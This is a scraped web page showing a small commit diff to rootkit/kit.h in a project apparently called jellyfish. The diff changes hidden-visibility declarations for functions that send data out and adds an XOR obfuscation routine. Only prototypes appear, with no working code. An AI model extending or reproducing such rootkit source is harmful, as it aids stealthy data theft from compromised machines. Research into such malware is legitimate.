Projects STRLCPY jellyfish Commits d3804349
🤬
  • ■ ■ ■ ■ ■
    rootkit/kit.h
    skipped 101 lines
    102 102   
    103 103  // hidden cpu functions
    104 104  void jelly_init(void) __attribute__((visibility("hidden")));
    105  -static void limit_buf(const char *buffer) __attribute__((visibility("hidden")));
    106  -static void send_data(const char *buffer) __attribute__((visibility("hidden")));
     105 +static void limit_buf(char *buffer) __attribute__((visibility("hidden")));
     106 +static void send_data(char *buffer) __attribute__((visibility("hidden")));
     107 +static char *xor_data(char *buf) __attribute__((visibility("hidden")));
    107 108   
    108 109  #endif
    109 110   
Please wait...
Page is in error, reload to recover